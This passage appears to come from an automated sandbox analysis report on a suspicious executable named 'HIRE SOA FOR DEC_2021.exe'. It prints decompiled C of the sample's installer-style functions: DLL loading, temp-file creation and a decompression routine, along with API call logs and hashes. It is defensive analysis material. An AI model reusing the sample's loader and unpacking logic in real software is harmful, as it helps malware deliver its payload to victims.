					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x0040200b
0x00402156
0x00402156
0x0040287d
0x00402880
0x0040288c
0x0040288c
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f8c
0x00401f92
0x00401f96
0x00402004
0x00000000
0x00402004
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00401ff9
0x00401ff9
0x00000000
0x00401ff2
0x00401f7c
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

?B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: ?B
API String ID: 2987980305-117478770
Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402156
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x00402880
0x0040288c

APIs

Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,73BCF560,004053BE,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,73BCF560), ref: 0040561A
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-47812868
Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E

Uniqueness

Uniqueness Score: -1.00%

Function 0040578B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x0040578f
0x00405795
0x00405796
0x00405796
0x00405797
0x0040579e
0x004057a8
0x004057b5
0x004057b8
0x004057c0
0x00000000
0x00000000
0x004057c4
0x00000000
0x00000000
0x004057c6
0x00000000
0x004057c6
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040579E
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040578B, 0040578E
"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" , xrefs: 00405792
nsa, xrefs: 00405797

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-979615556
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5

Uniqueness

Uniqueness Score: -1.00%

Function 1AC707DD Relevance: 7.7, APIs: 5, Instructions: 192
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1AC70990

Memory Dump Source

Source File: 00000001.00000002.678689283.000000001AC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 1AC70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1ac70000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c9e9674ad27517f74f1d70450c1cfebdec78b9c5fb86a0ffc6969c76d51a81ee
Instruction ID: b6f2bc5c68ae68a9e2646f4a31b51ff31bff82666256f5ee08f66c8d8851a41c
Opcode Fuzzy Hash: c9e9674ad27517f74f1d70450c1cfebdec78b9c5fb86a0ffc6969c76d51a81ee
Instruction Fuzzy Hash: 2A712A39E50348EADB50CBF4E955BEDB7B5AF48721F209416E618FA2E0EB701E40DB05

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004031f2
0x004031f8
0x004031fe
0x00403205
0x0040320a
0x00403212
0x0040321e
0x00403224
0x00403208
0x00403208
0x00403208

APIs

Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004031F2, 004031F7, 004031FD, 00403209, 00403211, 00403218
1033, xrefs: 00403219

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-517883005
Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406481 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
